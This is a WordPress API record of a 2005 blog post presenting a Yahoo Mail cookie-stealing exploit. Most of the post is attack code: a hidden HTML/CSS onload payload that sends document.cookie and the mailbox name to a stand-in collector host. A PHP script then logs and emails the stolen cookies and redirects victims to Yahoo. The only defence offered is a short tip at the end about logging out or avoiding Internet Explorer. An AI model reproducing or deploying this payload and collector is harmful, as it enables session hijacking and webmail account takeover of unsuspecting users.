{"id":331,"date":"2005-12-12T06:10:45","date_gmt":"2005-12-11T23:10:45","guid":{"rendered":""},"modified":"2005-12-12T06:10:45","modified_gmt":"2005-12-11T23:10:45","slug":"yahoo-exploit-no-password-needed","status":"publish","type":"post","link":"https:\/\/deepquest.code511.com\/blog\/2005\/12\/yahoo-exploit-no-password-needed\/","title":{"rendered":"Yahoo exploit: no password needed"},"content":{"rendered":"

Once again webmail services are facing security issues. This one aim the same target: connect without user’s password. This time yahoo is vulnerable.<\/p>\n

\n
Code:<\/div>\n
 \r\n<DIV id=b style="VISIBILITY: hidden">\r\n<STYLE onload="window.status=''; var x = escape(document.cookie).substr(0,1900); b.innerHTML='<iframe src=http:\/\/your-site-here.com\/script.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&amp;cookie=\\''+x+'\\'  frameborder=0 width=10 height=10><\/iframe>';" type=text\/css>\r\n<\/STYLE>\r\n<\/DIV><\/div><\/pre>\n<\/div>\n
\nscript.php:<\/p>\n
\n
Code:<\/div>\n
 \r\n<?\r\n$file="cookie.log";\r\nif (isset($_REQUEST["id"]) && isset($_REQUEST["cookie"])){\r\n $logcookie = $_REQUEST["cookie"];\r\n $logcookie = rawurldecode($logcookie);\r\n $logemail = $_REQUEST["id"];\r\n $logemail = rawurldecode($logemail);\r\n if (file_exists($file)) {\r\n   $handle=fopen($file, "r+");\r\n   $filecontence=fread($handle,filesize("$file"));\r\n   fclose($handle);\r\n }\r\n $handle=fopen($file, "w");\r\n fwrite($handle, "$logemail - $logcookie\\n$filecontence\\n ");\r\n \/\/Writing email address and cookie then the rest of the log\r\n fclose($handle);\r\nmail("email", "$logemail", "$logemail\\n$logcookie\\n$filecontence\\n");\r\n}\r\nheader("Location: [url=http:\/\/mail.yahoo.com\/]http:\/\/mail.yahoo.com[\/url]");\r\n?><\/div><\/pre>\n<\/div>\n
\nto protect from it make sure you hit the logout<\/b> link instead of just closing the browser window. also this only works for internet explorer<\/b> so use any other browser.<\/div>\n","protected":false},"excerpt":{"rendered":"
Yahoo exploit: no password needed<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[3],"tags":[],"class_list":["post-331","post","type-post","status-publish","format-standard","hentry","category-security"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4bBYZ-5l","_links":{"self":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/331","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/comments?post=331"}],"version-history":[{"count":0,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/331\/revisions"}],"wp:attachment":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/media?parent=331"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/categories?post=331"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/tags?post=331"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}